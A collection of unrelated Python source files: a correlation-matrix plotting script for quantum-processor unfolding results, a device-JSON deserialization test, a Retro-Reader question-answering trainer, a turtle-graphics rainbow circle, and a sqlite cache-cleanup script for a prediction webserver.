    'qpu_hinoise_reg0':
    "QPU, regular noise",
    'qpu_lonoise_reg0':
    "QPU, lower noise",
    'qpu_lonoise_reg0_gamma0':
    r"QPU, lower noise, $\gamma$=0",
    'qpu_lonoise_reg0_gamma1':
    r"QPU, lower noise, $\gamma$=1",
    'qpu_lonoise_reg0_gamma0_48bits':
    r"QPU, lower noise, $\gamma$=0, encoding=(4,8)"
}
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def FromFile(csv_file):
    """Load an (nsamples x nparams) CSV and summarize it.

    Returns a dict with the per-column mean, standard deviation ('rms')
    and the parameter correlation matrix.
    """
    samples = np.genfromtxt(csv_file, delimiter=',')
    summary = {
        'mean': np.mean(samples, axis=0),
        'rms': np.std(samples, axis=0),
        'corr': np.corrcoef(samples, rowvar=False),
    }
    return summary
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Per-method summaries loaded from the unfolding result CSVs; keys match the
# entries (including the currently commented-out ones) in known_methods.
unfolded_data = {
    'qpu_hinoise_reg0':
    FromFile(f"csv/results.obs_{obs}.qpu_hinoise.reg_0.4bits.csv"),
    'qpu_lonoise_reg0':
    FromFile(f"csv/results.obs_{obs}.qpu_lonoise.reg_0.4bits.csv"),
    'qpu_lonoise_reg0_gamma0':
    FromFile(
        f"csv/results_syst.obs_{obs}.qpu_lonoise.reg_0.gamma_0.4bits.csv"),
    'qpu_lonoise_reg0_gamma1':
    FromFile(
        f"csv/results_syst.obs_{obs}.qpu_lonoise.reg_0.gamma_1.4bits.csv"),
    'qpu_lonoise_reg0_gamma0_48bits':
    FromFile(
        f"csv/results_syst.obs_{obs}.qpu_lonoise.reg_0.gamma_0.48bits.csv"),
}
Nbins = 5  # number of unfolded spectrum bins
Nsyst = 2  # number of systematic nuisance parameters (norm, shape)
#f, ax = plt.subplots(figsize=(11, 9))
# One correlation-matrix heatmap per method, saved as a PDF.
for method in known_methods:
    print("INFO: correlation matrix for method", method)
    corr = unfolded_data[method]['corr']
    #mask = np.zeros_like(corr, dtype=np.bool)
    #mask[np.triu_indices_from(mask)] = True
    print(unfolded_data[method]['corr'])
    # Systematic-variation runs carry the two extra nuisance parameters.
    Nparams = Nbins
    names = ["bin1", "bin2", "bin3", "bin4", "bin5"]
    if "gamma" in method:
        Nparams += Nsyst
        names += ["norm", "shape"]
    f = plt.figure()
    ax = f.add_subplot()
    # Diverging colormap centered on zero correlation.
    cax = ax.imshow(corr, cmap=plt.cm.get_cmap('bwr'), vmin=-1, vmax=1)
    f.colorbar(cax)
    #plt.title( labels[method])
    ax.set_xlim(-0.5, Nparams - 0.5)
    ax.set_ylim(-0.5, Nparams - 0.5)
    ticks = np.arange(Nparams)
    ax.set_xticks(ticks)
    ax.set_yticks(ticks)
    ax.set_xticklabels(names)
    ax.set_yticklabels(names)
    plt.xticks(rotation=45)
    plt.show()
    f.savefig(f"correlations_{obs}_{nbits}bits_syst_{method}.pdf")
|
#!/usr/bin/env python
import json
import os
import sys
try:
    from fwd_api.devices_response import DevicesResponse, DeviceResponse
except ImportError:
    # Only trap the failed import: the previous bare "except:" would also
    # have swallowed unrelated errors, including SystemExit/KeyboardInterrupt.
    print('Error importing from fwd_api. Check that you ran ' +
          'setup (see README).')
    sys.exit(-1)
# Path to a checked-in sample of the devices endpoint's JSON response.
DEVICES_JSON = os.path.join(os.path.dirname(__file__),
                            '..', 'fwd-api-data', 'devices',
                            'example.json')
# We know a priori that the json in DEVICES_JSON should deserialize
# into the following device responses.
EXPECTED_DEVICES = [
    DeviceResponse('veos-0', 1),
    DeviceResponse('veos-1', 2),
]
def test_deserialization():
    """Round-trip the sample JSON through DevicesResponse and compare."""
    with open(DEVICES_JSON) as fd:
        json_list = json.loads(fd.read())
    devices_response = DevicesResponse.from_json(json_list)
    device_response_list = devices_response.get_device_response_list()
    # Ensure that parsed responses equal expected responses
    assert device_response_list == EXPECTED_DEVICES

if __name__ == '__main__':
    test_deserialization()
|
from typing import Dict, List, Optional, Union, Any, Tuple
from torch import nn
import numpy as np
from torch.nn.modules import module
from transformers import Trainer, AutoConfig
from transformers.trainer_utils import (
EvalLoopOutput,
PredictionOutput,
EvalPrediction,
speed_metrics,
denumpify_detensorize,
)
from datasets.load import load_metric
from datasets import Dataset
from processor import DataProcessor
from model import (
RobertaForSequenceClassification,
RobertaForQuestionAnsweringAVPool,
RobertaCNNForQuestionAnsweringAVPool,
)
import collections
import time
import math
from tqdm import tqdm
import os
import json
from sklearn.metrics import f1_score, accuracy_score
from copy import copy
class SketchReader(Trainer):
    """Trainer wrapper for the sketch (answerable/unanswerable) classifier.

    Implements external front verification (E-FV): per-example answerable and
    not-answerable logits are averaged over the example's strided features and
    their difference is written to ``cls_score.json`` in ``args.output_dir``.
    """

    def __init__(self, *args, eval_examples=None, **kwargs):
        super().__init__(*args, **kwargs)
        # Raw (pre-tokenization) examples; needed to map features back to guids.
        self.eval_examples = eval_examples

    def post_process_function(
        self,
        output: Union[np.ndarray, EvalLoopOutput],
        eval_examples: Dataset,
        eval_dataset: Dataset,
        mode="predict",
    ):
        """Aggregate per-feature logits into per-example E-FV scores.

        Returns an EvalPrediction in "evaluate" mode, otherwise the
        guid -> score_ext mapping (also dumped to cls_score.json).
        """
        if isinstance(output, EvalLoopOutput):
            logits = output.predictions
        else:
            logits = output
        # Map each example guid to the indices of its strided features.
        example_id_to_index = {k: i for i, k in enumerate(eval_examples["guid"])}
        features_per_example = collections.defaultdict(list)
        for i, feature in enumerate(eval_dataset):
            features_per_example[example_id_to_index[feature["example_id"]]].append(i)
        count_map = {k: len(v) for k, v in features_per_example.items()}
        logits_ans = np.zeros(len(count_map))
        logits_na = np.zeros(len(count_map))
        for example_index, example in enumerate(tqdm(eval_examples)):
            n_strides = count_map[example_index]
            # NOTE(review): logits are indexed by example_index rather than by
            # the example's feature indices — if an example has several strided
            # features this only accounts for one row; confirm that upstream
            # already aggregated per example.
            logits_ans[example_index] += logits[example_index, 0] / n_strides
            logits_na[example_index] += logits[example_index, 1] / n_strides
        # Calculate E-FV score: answerable minus not-answerable.
        score_ext = logits_ans - logits_na
        # Save external front verification score
        final_map = dict(zip(eval_examples["guid"], score_ext.tolist()))
        with open(os.path.join(self.args.output_dir, "cls_score.json"), "w") as writer:
            writer.write(json.dumps(final_map, indent=4) + "\n")
        if mode == "evaluate":
            return EvalPrediction(
                predictions=logits,
                label_ids=output.label_ids,
            )
        else:
            return final_map

    def predict(
        self,
        eval_dataset: Optional[Dataset] = None,
        eval_examples: Optional[Dataset] = None,
        ignore_keys: Optional[List[str]] = None,
        metric_key_prefix: str = "predict",
    ) -> Dict[str, float]:
        """Run the prediction loop and return the post-processed E-FV scores.

        Bug fix: the post-processed result was computed but never returned,
        so callers always received None despite the declared return type.
        """
        self._memory_tracker.start()
        eval_dataset = self.eval_dataset if eval_dataset is None else eval_dataset
        eval_dataloader = self.get_eval_dataloader(eval_dataset)
        eval_examples = self.eval_examples if eval_examples is None else eval_examples
        start_time = time.time()  # NOTE(review): currently unused; kept for speed_metrics
        eval_loop = self.prediction_loop if self.args.use_legacy_prediction_loop else self.evaluation_loop
        output = eval_loop(
            eval_dataloader,
            description="Prediction",
            # No point gathering the predictions if there are no metrics, otherwise we defer to
            # self.args.prediction_loss_only
            # prediction_loss_only=True if self.compute_metrics is None else None,
            ignore_keys=ignore_keys,
            # metric_key_prefix=metric_key_prefix,
        )
        eval_preds = self.post_process_function(
            eval_examples=eval_examples, eval_dataset=eval_dataset, output=output
        )
        return eval_preds
class IntensiveReader(Trainer):
def __init__(self, *args, eval_examples=None, data_args=None, **kwargs):
    """Standard Trainer init plus the raw eval examples and the data-args
    object used by answer-span post-processing."""
    super().__init__(*args, **kwargs)
    self.eval_examples = eval_examples
    self.data_args = data_args
def post_process_function(
self,
output: Union[np.ndarray, EvalLoopOutput],
eval_examples: Dataset,
eval_dataset: Dataset,
mode="predict",
) -> Union[List[Dict[str, Any]], EvalPrediction]:
# print(output)
predictions, _, _, scores_diff_json = self.compute_predictions(
eval_examples,
eval_dataset,
output.predictions,
version_2_with_negative=self.data_args.version_2_with_negative,
n_best_size=self.data_args.n_best_size,
max_answer_length=self.data_args.max_answer_length,
null_score_diff_threshold=self.data_args.null_score_diff_threshold,
output_dir=self.args.output_dir,
)
# Format the result to the format the metric expects.
formatted_predictions = [
{"id": k, "prediction_text": v, "no_answer_probability": scores_diff_json[k]}
for k, v in predictions.items()
]
if mode == "predict":
return formatted_predictions
else:
references = [{"id": ex["guid"], "answers": ex["answers"]} for ex in eval_examples]
return EvalPrediction(predictions=formatted_predictions, label_ids=references)
def compute_predictions(
self,
examples: Dataset,
features: Dataset,
predictions: Tuple[np.ndarray, np.ndarray],
version_2_with_negative: bool = False,
n_best_size: int = 20,
max_answer_length: int = 30,
null_score_diff_threshold: float = 0.0,
output_dir: Optional[str] = None,
use_choice_logits: bool = False,
):
# Threshold-based Answerable Verification (TAV)
if len(predictions) not in [2, 3]:
raise ValueError(
"`predictions` should be a tuple with two or three elements "
"(start_logits, end_logits, choice_logits)."
)
all_start_logits, all_end_logits = predictions[:2]
all_choice_logits = None
if len(predictions) == 3:
all_choice_logits = predictions[-1]
# Build a map example to its corresponding features.
example_id_to_index = {k: i for i, k in enumerate(examples["guid"])}
features_per_example = collections.defaultdict(list)
for i, feature in enumerate(features):
features_per_example[example_id_to_index[feature["example_id"]]].append(i)
all_predictions = collections.OrderedDict()
all_nbest_json = collections.OrderedDict()
scores_diff_json = collections.OrderedDict() if version_2_with_negative else None
# Let's loop over all the examples!
for example_index, example in enumerate(tqdm(examples)):
# Those are the indices of the features associated to the current example.
feature_indices = features_per_example[example_index]
min_null_prediction = None
prelim_predictions = []
# Looping through all the features associated to the current example.
for feature_index in feature_indices:
# We grab the predictions of the model for this feature.
start_logits = all_start_logits[feature_index]
end_logits = all_end_logits[feature_index]
# score_null = s1 + e1
feature_null_score = start_logits[0] + end_logits[0]
if all_choice_logits is not None:
choice_logits = all_choice_logits[feature_index]
if use_choice_logits:
feature_null_score = choice_logits[1]
# This is what will allow us to map some the positions
# in our logits to span of texts in the original context.
offset_mapping = features[feature_index]["offset_mapping"]
# Optional `token_is_max_context`,
# if provided we will remove answers that do not have the maximum context
# available in the current feature.
token_is_max_context = features[feature_index].get("token_is_max_context", None)
# Update minimum null prediction.
if min_null_prediction is None or min_null_prediction["score"] > feature_null_score:
min_null_prediction = {
"offsets": (0, 0),
"score": feature_null_score,
"start_logit": start_logits[0],
"end_logit": end_logits[0],
}
# Go through all possibilities for the {top k} greater start and end logits
# top k = n_best_size if not beam_based else n_start_top, n_end_top
start_indexes = np.argsort(start_logits)[-1 : -n_best_size - 1 : -1].tolist()
end_indexes = np.argsort(end_logits)[-1 : -n_best_size - 1 : -1].tolist()
for start_index in start_indexes:
for end_index in end_indexes:
# Don't consider out-of-scope answers!
# either because the indices are out of bounds
# or correspond to part of the input_ids that are note in the context.
if (
start_index >= len(offset_mapping)
or end_index >= len(offset_mapping)
or offset_mapping[start_index] is None
or offset_mapping[end_index] is None
):
continue
# Don't consider answers with a length negative or > max_answer_length.
if end_index < start_index or end_index - start_index + 1 > max_answer_length:
continue
# Don't consider answer that don't have the maximum context available
# (if such information is provided).
if token_is_max_context is not None and not token_is_max_context.get(
str(start_index), False
):
continue
prelim_predictions.append(
{
"offsets": (offset_mapping[start_index][0], offset_mapping[end_index][1]),
"score": start_logits[start_index] + end_logits[end_index],
"start_logit": start_logits[start_index],
"end_logit": end_logits[end_index],
}
)
if version_2_with_negative:
# Add the minimum null prediction
prelim_predictions.append(min_null_prediction)
null_score = min_null_prediction["score"]
# Only keep the best `n_best_size` predictions
predictions = sorted(prelim_predictions, key=lambda x: x["score"], reverse=True)[:n_best_size]
# Add back the minimum null prediction if it was removed because of its low score.
if version_2_with_negative and not any(p["offsets"] == (0, 0) for p in predictions):
predictions.append(min_null_prediction)
# Use the offsets to gather the answer text in the original context.
context = example["context"]
for pred in predictions:
offsets = pred.pop("offsets")
pred["text"] = context[offsets[0] : offsets[1]]
# In the very rare edge case we have not a single non-null prediction,
# we create a fake prediction to avoid failure.
if len(predictions) == 0 or (len(predictions) == 1 and predictions[0]["text"] == ""):
predictions.insert(
0,
{
"text": "",
"start_logit": 0.0,
"end_logit": 0.0,
"score": 0.0,
},
)
# Compute the softmax of all scores
# (we do it with numpy to stay independent from torch/tf) in this file,
# using the LogSum trick).
scores = np.array([pred.pop("score") for pred in predictions])
exp_scores = np.exp(scores - np.max(scores))
probs = exp_scores / exp_scores.sum()
# Include the probabilities in our predictions.
for prob, pred in zip(probs, predictions):
pred["probability"] = prob
# Pick the best prediction. If the null answer is not possible, this is easy.
if not version_2_with_negative:
all_predictions[example["guid"]] = predictions[0]["text"]
else:
# Otherwise we first need to find the best non-empty prediction.
# print(i, len(predictions), type(predictions), predictions, predictions[0])
i = 0
while i < len(predictions) and predictions[i]["text"] == "": # i == 2, len(predictions)=2
i += 1
if i != len(predictions):
best_non_null_pred = predictions[i]
# Then we compare to the null prediction using the threshold.
score_diff = (
null_score - best_non_null_pred["start_logit"] - best_non_null_pred["end_logit"]
)
scores_diff_json[example["guid"]] = float(score_diff) # To be JSON-serializable.
if score_diff > null_score_diff_threshold:
all_predictions[example["guid"]] = ""
else:
all_predictions[example["guid"]] = best_non_null_pred["text"]
else:
scores_diff_json[example["guid"]] = float(null_score)
all_predictions[example["guid"]] = ""
# Make `predictions` JSON-serializable by casting np.float back to float.
all_nbest_json[example["guid"]] = [
{
k: (float(v) if isinstance(v, (np.float16, np.float32, np.float64)) else v)
for k, v in pred.items()
}
for pred in predictions
]
# If we have an output_dir, let's save all those dicts.
if output_dir is not None:
if not os.path.isdir(output_dir):
raise EnvironmentError(f"{output_dir} is not a directory.")
prediction_file = os.path.join(output_dir, "predictions.json")
nbest_file = os.path.join(output_dir, "nbest_predictions.json")
if version_2_with_negative:
null_odds_file = os.path.join(output_dir, "null_odds.json")
with open(prediction_file, "w") as writer:
writer.write(json.dumps(all_predictions, indent=4) + "\n")
with open(nbest_file, "w") as writer:
writer.write(json.dumps(all_nbest_json, indent=4) + "\n")
if version_2_with_negative:
with open(null_odds_file, "w") as writer:
writer.write(json.dumps(scores_diff_json, indent=4) + "\n")
return all_predictions, all_nbest_json, scores_diff_json, scores_diff_json
def predict(
self,
eval_dataset: Optional[Dataset] = None,
eval_examples: Optional[Dataset] = None,
ignore_keys: Optional[List[str]] = None,
metric_key_prefix: str = "predict",
) -> Dict[str, float]:
# memory metrics - must set up as early as possible
self._memory_tracker.start()
eval_dataset = self.eval_dataset if eval_dataset is None else eval_dataset
eval_dataloader = self.get_eval_dataloader(eval_dataset)
start_time = time.time()
eval_examples = self.eval_examples if eval_examples is None else eval_examples
compute_metrics = self.compute_metrics
self.compute_metrics = None
eval_loop = self.prediction_loop if self.args.use_legacy_prediction_loop else self.evaluation_loop
try:
output = eval_loop(
eval_dataloader,
description="Evaluation",
prediction_loss_only=True if compute_metrics is None else None,
ignore_keys=ignore_keys,
metric_key_prefix=metric_key_prefix,
)
finally:
self.compute_metrics = compute_metrics
if isinstance(eval_dataset, Dataset):
eval_dataset.set_format(
type=eval_dataset.format["type"],
columns=list(eval_dataset.features.keys()),
)
eval_preds = self.post_process_function(output, eval_examples, eval_dataset)
class RearVerifier:
    """Rear verification for Retro-Reader.

    Combines the sketch reader's external front-verification score with the
    intensive reader's null-odds (TAV) score, and blanks out answers whose
    combined score exceeds the answerability threshold.
    """

    def __init__(
        self,
        beta1: int = 1,
        beta2: int = 1,
        best_cof: int = 1,
    ):
        self.beta1 = beta1      # weight of the external front-verification score
        self.beta2 = beta2      # weight of the null-odds (score_diff) score
        self.best_cof = best_cof  # coefficient applied to n-best probabilities

    def __call__(
        self,
        score_ext: Dict[str, float],
        score_diff: Dict[str, float],
        nbest_preds: Dict[str, Dict[int, Dict[str, float]]],
    ):
        """Return (final answer text per qid, combined score per qid)."""
        all_scores = collections.OrderedDict()
        assert score_ext.keys() == score_diff.keys()
        for key in score_ext.keys():
            if key not in all_scores:
                all_scores[key] = []
            # BUG FIX: the original appended a *list* [b1*ext, b2*diff], so
            # sum(scores) below summed lists and raised TypeError.  Append the
            # two weighted scores as scalars instead, then average them.
            all_scores[key].append(self.beta1 * score_ext[key])
            all_scores[key].append(self.beta2 * score_diff[key])
        output_scores = {}
        for key, scores in all_scores.items():
            mean_score = sum(scores) / float(len(scores))
            output_scores[key] = mean_score
        # Aggregate n-best probabilities per candidate text (identical texts
        # from different spans accumulate probability).
        all_nbest = collections.OrderedDict()
        for key, entries in nbest_preds.items():
            if key not in all_nbest:
                all_nbest[key] = collections.defaultdict(float)
            for entry in entries:
                prob = self.best_cof * entry["probability"]
                all_nbest[key][entry["text"]] += prob
        output_predictions = {}
        for key, entry_map in all_nbest.items():
            sorted_texts = sorted(entry_map.keys(), key=lambda x: entry_map[x], reverse=True)
            best_text = sorted_texts[0]
            output_predictions[key] = best_text
        for qid in output_predictions.keys():
            # Combined score above the threshold means "unanswerable".
            if output_scores[qid] > 1:
                output_predictions[qid] = ""
        return output_predictions, output_scores
class RetroReader:
    """Retrospective Reader pipeline.

    Couples a *sketch* reader (sequence classifier deciding answerability)
    with an *intensive* reader (span extractor) and fuses their scores with
    a RearVerifier to produce the final answer.
    """

    def __init__(
        self,
        sketch_model_name_or_path="klue/roberta-large",
        intensive_model_name_or_path="klue/roberta-large",
        training_args=None,
        data_args=None,
        train_examples=None,
        eval_examples=None,
        test_examples=None,
        tokenizer=None,
        data_collator=None,
        post_process_function=None,
        # compute_metrics=None,
    ):
        self.sketch_model_name_or_path = sketch_model_name_or_path
        self.intensive_model_name_or_path = intensive_model_name_or_path
        self.training_args = training_args
        self.data_args = data_args
        self.train_examples = train_examples
        self.eval_examples = eval_examples
        self.test_examples = test_examples
        self.tokenizer = tokenizer
        self.data_collator = data_collator
        self.post_process_function = post_process_function
        # self.compute_metrics = compute_metrics
        # Column names come from whichever split is available; eval is the fallback.
        if train_examples:
            self.column_names = self.train_examples.column_names
        else:
            self.column_names = self.eval_examples.column_names
        # Shared tokenization/feature-preparation helper for both readers.
        self.mrc_processor = DataProcessor(
            data_args=data_args,
            training_args=training_args,
            tokenizer=tokenizer,
            column_names=self.column_names,
        )
        self.init_module("sketch")
        self.init_module("intensive")
        self.rear_verifier = RearVerifier()

    def __call__(
        self,
        query: str,
        context: Union[str, List[str]],
    ):
        """Answer *query* against *context*; returns (predictions, scores)."""
        if isinstance(context, list):
            context = " ".join(context)
        # Wrap the single (question, context) pair as a one-row Dataset.
        predict_examples = Dataset.from_dict(
            {"example_id": ["0"], "question": [query], "context": [context], "guid": ["0"]}
        )
        sketch_features = predict_examples.map(
            self.mrc_processor.prepare_test_features_for_sketch_reader,
            batched=True,
            remove_columns=predict_examples.column_names,
        )
        intensive_features = predict_examples.map(
            self.mrc_processor.prepare_test_features_for_intensive_reader,
            batched=True,
            remove_columns=predict_examples.column_names,
        )
        # self,
        # predict_dataset: Dataset,
        # predict_examples: Dataset,
        # ignore_keys: Optional[List[str]] = None,
        # metric_key_prefix: str = "test",
        # NOTE(review): both predict() calls pass predict_dataset/predict_examples
        # kwargs, but the readers' predict() signatures declare
        # eval_dataset/eval_examples — confirm these keyword names match.
        score_ext = self.sketch_reader.predict(
            predict_dataset=predict_examples, predict_examples=sketch_features
        )
        _, nbest_preds, score_diff, _ = self.intensive_reader.predict(
            # _, nbest_preds, score_diff, _ = self.intensive_reader.post_process_function(
            predict_dataset=predict_examples,
            predict_examples=intensive_features,
        )
        predictions, scores = self.rear_verifier(score_ext, score_diff, nbest_preds)
        return predictions, scores

    def predict(self):
        """Run evaluation on both readers (results are not collected here)."""
        self.sketch_reader.evaluate()
        self.intensive_reader.evaluate()

    def train(self):
        """Train the sketch reader first, then the intensive reader."""
        # sketch_reader_result = self.sketch_reader.evaluate()
        # intensive_reader_result = self.intensive_reader.evaluate()
        # ------------------------------------------------------
        sketch_reader_result = self.sketch_reader.train()
        # self.save_and_log(self.sketch_reader, sketch_reader_result, module_name="sketch")
        intensive_reader_result = self.intensive_reader.train()
        # self.save_and_log(self.intensive_reader, intensive_reader_result, module_name="intensive")

    def preprocess_examples(self, module_name="sketch"):
        """Tokenize the splits for the given reader.

        Returns (train_dataset, eval_dataset); the train split is currently
        not prepared and comes back as None.
        """
        with self.training_args.main_process_first(
            desc=f"train dataset for {module_name} reader map pre-processing"
        ):
            # NOTE(review): train preprocessing is not implemented yet.
            train_dataset = None
        with self.training_args.main_process_first(
            desc=f"validation dataset for {module_name} reader map pre-processing"
        ):
            eval_dataset = self.eval_examples.map(
                self.mrc_processor.prepare_eval_features_for_sketch_reader
                if module_name == "sketch"
                else self.mrc_processor.prepare_eval_features_for_intensive_reader,
                batched=True,
                num_proc=self.data_args.preprocessing_num_workers,
                remove_columns=self.column_names,
                load_from_cache_file=not self.data_args.overwrite_cache,
                desc=f"Running tokenizer on validation dataset for {module_name} reader",
            )
        return train_dataset, eval_dataset

    def init_module(self, module_name="sketch"):
        """Build model, datasets, metrics and Trainer for one reader module."""
        if module_name == "sketch":
            # Sketch reader: binary answerable/unanswerable classifier.
            sketch_reader_config = AutoConfig.from_pretrained(self.sketch_model_name_or_path, num_labels=2)
            sketch_reader_model = RobertaForSequenceClassification.from_pretrained(
                self.sketch_model_name_or_path, config=sketch_reader_config
            )
            (
                self.train_dataset_for_sketch_reader,
                self.eval_dataset_for_sketch_reader,
            ) = self.preprocess_examples(module_name="sketch")

            def compute_metrics_for_sketch_reader(p: EvalPrediction):
                # Classification metrics for the answerability head.
                labels = p.label_ids
                preds = p.predictions.argmax(-1)
                f1 = f1_score(labels, preds)
                acc = accuracy_score(labels, preds)
                return {"f1": f1, "accuracy": acc}

            # self.training_args.metric_for_best_model = self.data_args.load_best_model_at_end_sketch_reader
            # self.training_args.load_best_model_at_end = True
            # Copy the shared args so per-module tweaks don't leak across readers.
            sketch_reader_args = copy(self.training_args)
            sketch_reader_args.metric_for_best_model = "eval_f1"
            sketch_reader_args.output_dir = "sketch_reader_outputs"
            self.sketch_reader = SketchReader(
                model=sketch_reader_model,
                args=sketch_reader_args,
                train_dataset=self.train_dataset_for_sketch_reader if self.training_args.do_train else None,
                eval_dataset=self.eval_dataset_for_sketch_reader if self.training_args.do_eval else None,
                eval_examples=self.eval_examples if self.training_args.do_eval else None,
                tokenizer=self.tokenizer,
                data_collator=self.data_collator,
                # post_process_function=self.mrc_processor.post_processing_function,
                compute_metrics=compute_metrics_for_sketch_reader,
            )
        elif module_name == "intensive":
            # Intensive reader: span extraction with answerable-verification pooling.
            intensive_reader_config = AutoConfig.from_pretrained(self.intensive_model_name_or_path)
            # intensive_reader_model = RobertaForQuestionAnsweringAVPool.from_pretrained(
            intensive_reader_model = RobertaCNNForQuestionAnsweringAVPool.from_pretrained(
                self.intensive_model_name_or_path, config=intensive_reader_config
            )
            (
                self.train_dataset_for_intensive_reader,
                self.eval_dataset_for_intensive_reader,
            ) = self.preprocess_examples(module_name="intensive")

            def compute_metrics(p: EvalPrediction):
                # SQuAD v2 metrics (exact match / F1 with no-answer handling).
                metric = load_metric("squad_v2")
                return metric.compute(predictions=p.predictions, references=p.label_ids)

            # self.training_args.metric_for_best_model = self.data_args.load_best_model_at_end_intensive_reader
            # self.training_args.metric_for_best_model = "eval_exact"
            intensive_reader_args = copy(self.training_args)
            intensive_reader_args.metric_for_best_model = "eval_exact"
            intensive_reader_args.output_dir = "intensive_reader_outputs"
            self.intensive_reader = IntensiveReader(
                model=intensive_reader_model,
                args=intensive_reader_args,
                data_args=self.data_args,
                train_dataset=self.train_dataset_for_intensive_reader
                if self.training_args.do_train
                else None,
                eval_dataset=self.eval_dataset_for_intensive_reader if self.training_args.do_eval else None,
                eval_examples=self.eval_examples if self.training_args.do_eval else None,
                tokenizer=self.tokenizer,
                data_collator=self.data_collator,
                # post_process_function=self.mrc_processor.post_processing_function,
                compute_metrics=compute_metrics,
            )

    def save_and_log(self, reader, result, module_name="sketch"):
        """Save a trained reader, log train metrics, then run and log eval."""
        reader.save_model()
        metrics = result.metrics
        max_train_samples = (
            self.data_args.max_train_samples
            if self.data_args.max_train_samples is not None
            else len(self.train_examples)
        )
        metrics["train_samples"] = min(max_train_samples, len(self.train_examples))
        reader.log_metrics("train", metrics)
        reader.save_metrics("train", metrics)
        reader.save_state()
        metrics = reader.evaluate(
            eval_dataset=self.eval_dataset_for_sketch_reader
            if module_name == "sketch"
            else self.eval_dataset_for_intensive_reader,
            eval_examples=self.eval_examples,
        )
        print(metrics)
        max_eval_samples = (
            self.data_args.max_eval_samples
            if self.data_args.max_eval_samples is not None
            else len(self.eval_examples)
        )
        metrics["eval_samples"] = min(max_eval_samples, len(self.eval_examples))
        reader.log_metrics("eval", metrics)
        reader.save_metrics("eval", metrics)
|
#!/usr/bin/env python3
"""Draw an endlessly repeating circle in random colors with turtle graphics."""
import turtle as t
import random as r

title = 'Rainbow Circle'
t.title(title)
t.showturtle()
t.colormode(255)  # accept 0-255 integer RGB component values
t.speed(0)        # fastest animation speed
t.width(3)


def circle():
    """Step forward-2/left-1 forever, recoloring each step.

    720 steps complete one full circle; the loop never exits (close the
    window to stop).  The original guarded the loop with a constant
    ``x == 1`` flag whose elif/else branches were unreachable dead code;
    they are removed.
    """
    while True:
        # randrange's upper bound is exclusive: use 256 so that pure
        # white (255) is actually reachable (the original's 0-255 was not).
        t.color(r.randrange(256), r.randrange(256), r.randrange(256))
        t.begin_fill()
        t.forward(2)
        t.left(1)
        t.end_fill()


circle()
|
#!/usr/bin/env python
import sys
import os
import sqlite3
import shutil
import argparse
import fcntl
from datetime import datetime
from pytz import timezone
import tempfile
from libpredweb import myfunc
from libpredweb import webserver_common as webcom
# Timezone used when comparing job-finish timestamps against "now".
TZ = webcom.TZ
# Script name and its stem, used for log/err filenames and the lock file.
progname = os.path.basename(sys.argv[0])
rootname_progname = os.path.splitext(progname)[0]
def clean_cached_result(MAX_KEEP_DAYS, g_params):  # {{{
    """Clean out-dated cached result.

    Works on a temporary copy of the bookkeeping sqlite database: collects
    md5 keys whose finish date is older than MAX_KEEP_DAYS, deletes the
    corresponding cached zip files and db records, VACUUMs, then copies the
    compacted db back.  Returns 0 on success, 1 on failure.
    """
    path_log = g_params['path_log']
    path_cache = g_params['path_cache']
    logfile = f"{path_log}/{progname}.log"
    errfile = f"{path_log}/{progname}.err"
    db = f"{path_log}/cached_job_finished_date.sqlite3"
    # SECURITY/BUG FIX: tempfile.mktemp is deprecated and racy; mkstemp
    # creates the file atomically.  We only need the unique path — the
    # descriptor is closed and copyfile below overwrites the file.
    fd, tmpdb = tempfile.mkstemp(prefix=f"{db}_")
    os.close(fd)
    webcom.loginfo(f"copy db {db} to tmpdb {tmpdb}", logfile)
    try:
        shutil.copyfile(db, tmpdb)
    except OSError:
        webcom.loginfo(f"Failed to copy {db} to {tmpdb}.", errfile)
        return 1
    md5listfile = f"{path_log}/cache_to_delete.md5list"
    con = sqlite3.connect(tmpdb)
    webcom.loginfo(f"output the outdated md5 list to {md5listfile}", logfile)
    tablename = "data"
    with con:
        cur = con.cursor()
        # Stream the (md5, finish-date) rows in chunks and record the keys
        # older than the retention limit.
        cursor_iter = cur.execute(f"SELECT md5, date_finish FROM {tablename}")
        cnt = 0
        chunk_size = 1000
        with open(md5listfile, "w") as fpout:
            while True:
                result = cursor_iter.fetchmany(chunk_size)
                if not result:
                    break
                for row in result:
                    cnt += 1
                    md5_key = row[0]
                    finish_date_str = row[1]
                    finish_date = webcom.datetime_str_to_time(finish_date_str)
                    current_time = datetime.now(timezone(TZ))
                    timeDiff = current_time - finish_date
                    if timeDiff.days > MAX_KEEP_DAYS:
                        fpout.write(f"{md5_key}\n")
        # delete cached result folder and delete the record
        webcom.loginfo("Delete cached result folder and delete the record", logfile)
        hdl = myfunc.ReadLineByBlock(md5listfile)
        lines = hdl.readlines()
        cnt = 0
        while lines is not None:
            for line in lines:
                line = line.strip()
                if line != "":
                    cnt += 1
                    md5_key = line
                    subfoldername = md5_key[:2]
                    cachedir = os.path.join(path_cache, subfoldername, md5_key)
                    zipfile_cache = cachedir + ".zip"
                    if os.path.exists(zipfile_cache):
                        try:
                            os.remove(zipfile_cache)
                            webcom.loginfo(f"rm {zipfile_cache}", logfile)
                            # SECURITY FIX: parameterized query instead of
                            # interpolating the md5 value into SQL text.
                            cur.execute(f"DELETE FROM {tablename} WHERE md5 = ?",
                                        (md5_key,))
                        except Exception as e:
                            webcom.loginfo(f"Failed to delete with errmsg {e}", errfile)
            lines = hdl.readlines()
        hdl.close()
    # BUG FIX: VACUUM cannot run inside a transaction; it must execute after
    # the `with con:` block has committed the DELETEs.
    webcom.loginfo(f"VACUUM the database {tmpdb}", logfile)
    con.execute("VACUUM")
    con.close()
    # copy back
    webcom.loginfo(f"cp tmpdb {tmpdb} -> db {db}", logfile)
    try:
        shutil.copyfile(tmpdb, db)
    except Exception as e:
        webcom.loginfo(f"Failed to copy {tmpdb} to {db} with {e}", errfile)
        return 1
    webcom.loginfo(f"delete tmpdb {tmpdb}", logfile)
    try:
        os.remove(tmpdb)
    except Exception as e:
        webcom.loginfo(f"Failed to delete {tmpdb} with {e}", errfile)
        return 1
    return 0
# }}}
def main():  # {{{
    """main procedure"""
    # CLI: a JSON config file is required; retention age defaults to 360 days.
    parser = argparse.ArgumentParser(
        description='Clean outdated cached results',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=f'''\
Created 2018-10-21, updated 2022-03-10, Nanjiang Shu
Examples:
    {progname} -max-keep-day 360
''')
    parser.add_argument('-i', metavar='JSONFILE', dest='jsonfile',
                        type=str, required=True,
                        help='Provide the Json file with all parameters')
